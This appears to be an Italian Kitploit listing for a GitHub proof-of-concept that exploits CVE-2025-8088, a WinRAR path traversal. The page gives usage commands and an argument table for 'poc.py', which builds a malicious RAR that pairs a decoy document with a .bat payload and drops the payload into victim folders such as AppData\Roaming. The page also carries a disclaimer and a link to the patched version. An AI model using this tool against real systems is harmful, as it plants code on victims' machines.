Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-8088 — Questa PoC è per studio e test autorizzati. CVE-2025-8088 è attivamente sfruttata e un uso improprio può violare leggi o causare danni. Aggiorna a WinRAR 7.13+ per evitare RAR sospetti. | Kitploit
Strumenti/GitHubGitHub/ghostn4444/cve-2025-8088
Generazione di PayloadAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneBinary Exploitation
GitHubghostn4444/cve-2025-8088

CVE-2025-8088

Questa PoC è per studio e test autorizzati. CVE-2025-8088 è attivamente sfruttata e un uso improprio può violare leggi o causare danni. Aggiorna a WinRAR 7.13+ per evitare RAR sospetti.

Vedi Repository
11 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-8088

WinRAR: path traversal in WinRAR che consente l'esecuzione di codice arbitrario (CVE-2025-8088)

CVE-2025-8088 PoC - Exploit Furtivo - README Inglese (US)

CVE-2025-8088 PoC - Esplorazione Furtiva - README Portoghese (BR)

CVE-2025-8088 PoC – Exploit Nascosto - README Spagnolo (ES)

CVE-2025-8088 PoC – Override di Accesso - README Russo (RU)

root@kitploit:~
Exploit_cve_2025_8088.ps1

root@kitploit:~
python poc.py 

PoC

📋 Argomenti Obbligatori

⚙️ Argomenti Opzionali

🎯 Esempio di Utilizzo

root@kitploit:~
# Basic usage (auto-discover rar.exe)
python poc.py --decoy resume.txt --payload payload.bat --drop "C:\Users\Victim\Documents"

# Full custom configuration
python poc.py \
  --decoy document.pdf \
  --payload script.bat \
  --drop "C:\Users\Victim\AppData\Roaming" \
  --rar "C:\Program Files\WinRAR\rar.exe" \
  --out malicious.rar \
  --workdir ./build \
  --placeholder_len 150 \
  --max_up 20

Link Ufficiale GitHub Attribuzione: sxyrxyy

Scarica lo strumento
ArgomentoDescrizioneEsempio
--decoyPercorso del file esca (verrà creato se non esiste)resume.txt
--payloadPercorso del file payload (verrà creato se non esiste)payload.bat
--dropPercorso assoluto della directory di destinazione in cui verrà estratto il payloadC:\Users\Victim\Documents
ArgomentoDescrizioneValore PredefinitoNote
--rarPercorso di rar.exeRilevato automaticamenteControlla le posizioni comuni e il PATH
--outNome file RAR di outputpoc-cve-2025-8088.rarArchivio finale dannoso
--workdirDirectory di lavoro per i file temporaneiDirectory corrente (.)
--placeholder_lenLunghezza del segnaposto ADSmax(len(target_path), 128)Più lungo = traversal più affidabile
--max_upNumero di traversamenti delle directory padre (..\)16Minimo 8 consigliato
--base_outNome file RAR base intermedio<out>.base.rarFile temporaneo, eliminato dopo